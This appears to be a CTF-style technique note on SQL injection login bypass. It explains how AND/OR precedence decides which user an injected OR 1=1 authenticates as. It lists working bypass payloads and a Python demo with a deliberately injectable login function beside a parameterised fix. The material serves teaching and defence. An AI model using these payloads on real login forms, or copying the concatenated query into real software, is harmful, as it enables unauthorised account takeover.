web http sql-injection authentication-bypass operator-precedence

Bias row selection in injectable login queries by reasoning about AND/OR precedence instead of blindly appending OR 1=1.

SQLi where AND / OR Precedence Matters

SQL injection is not just "append OR 1=1". Operator precedence determines which row or branch the query actually selects.

Why It Works

  • username='...' AND password='...' with a careless OR 1=1 authenticates as an arbitrary low-ID user, not your target: AND binds tighter than OR, so the condition is evaluated as (username='...' AND password='...') OR 1=1, every row matches, and whichever row the engine returns first decides who you become.

Vulnerable Pattern

  • Login queries combining multiple conditions without explicit parentheses.

Exploit Flow

  1. Reason about the original query shape before choosing a payload.
  2. Test authentication with controlled injections in each field separately, then both together.
  3. If you land on the wrong user, adapt the payload to bias row selection toward the target account.

Variations

  • UNION, boolean conditions, comment placement, and row-order influence.

Common Blockers

  • The application takes the first matching row, and without an ORDER BY the engine decides which row that is, so a careless OR 1=1 logs you in as an arbitrary user rather than the one you named.

PoC Sketch

username=admin' -- -
username=admin' OR 1=1 -- -
password=' OR 1=1 -- -
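
Running the three PoC payloads above against a toy login query makes the precedence point from "Why It Works" and the row-order blocker concrete, and puts the parameterised query beside the concatenated one. This is an added example, not code from this page or from the referenced challenges: the users table, its placeholder passwords and the helper names (make_db, build_vulnerable_query, login_vulnerable, login_safe, demo) are constructed for illustration, using Python's sqlite3 module, whose AND/OR precedence follows the usual SQL rule (AND binds tighter than OR).

```python
import sqlite3

# Constructed sample table (not from the page): three users with placeholder passwords.
# Row order is the point: 'alice' has the lowest id and 'admin' does not.
SAMPLE_USERS = [("alice", "alice-pw"), ("admin", "admin-pw"), ("bob", "bob-pw")]


def make_db():
    """In-memory SQLite database with a plain users table (no index on username)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    return conn


def build_vulnerable_query(username, password):
    """The injectable shape: two conditions joined by AND, built by string concatenation."""
    return (
        "SELECT id, username FROM users "
        f"WHERE username='{username}' AND password='{password}'"
    )


def login_vulnerable(conn, username, password):
    """Like a careless login handler: return the username of the first matching row, or None."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[1] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: input is never parsed as SQL, so precedence cannot be abused."""
    row = conn.execute(
        "SELECT id, username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[1] if row else None


def demo():
    """Run the page's PoC payloads against both handlers and return who each one logs in as."""
    conn = make_db()
    return {
        # password=' OR 1=1 -- -  ->  username='admin' AND password='' OR 1=1 -- -'
        # AND binds tighter than OR, so every row matches; SQLite scans in rowid order: alice.
        "password_or": login_vulnerable(conn, "admin", "' OR 1=1 -- -"),
        # username=admin' OR 1=1 -- -  ->  username='admin' OR 1=1 -- -' AND ...
        # Again every row matches, so the first row (alice) wins, not admin.
        "username_or": login_vulnerable(conn, "admin' OR 1=1 -- -", "anything"),
        # username=admin' -- -  ->  username='admin' -- -' AND password='anything'
        # The password check is commented out and there is no OR, so only admin's row matches.
        "username_comment": login_vulnerable(conn, "admin' -- -", "anything"),
        # Parameterised handler: the same payload is just a literal username, so nothing matches.
        "safe": login_safe(conn, "admin' -- -", "anything"),
    }


if __name__ == "__main__":
    for case, user in demo().items():
        print(f"{case:18s} -> {user}")
```

Two things to take from the output. First, the fix is the bound-parameter query, not extra parentheses: parentheses only settle precedence for the SQL the developer wrote, while a placeholder keeps attacker input out of the parser entirely. Second, the "wrong user" result depends on the engine's scan order (SQLite here walks rowid order), which is why the page's blocker appears on some targets and not others; a login handler that asserts exactly one row matched, rather than taking the first, also turns the OR 1=1 case into a loud failure instead of a silent login.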

Good Situations To Use It

  • An injectable multi-condition login query.
  • You need a specific account, not any account.
  • You can inject into more than one field.

Sources

  • midnight_flag2026/web/blackbank
  • 0xFUN2026/web/tony_toolkit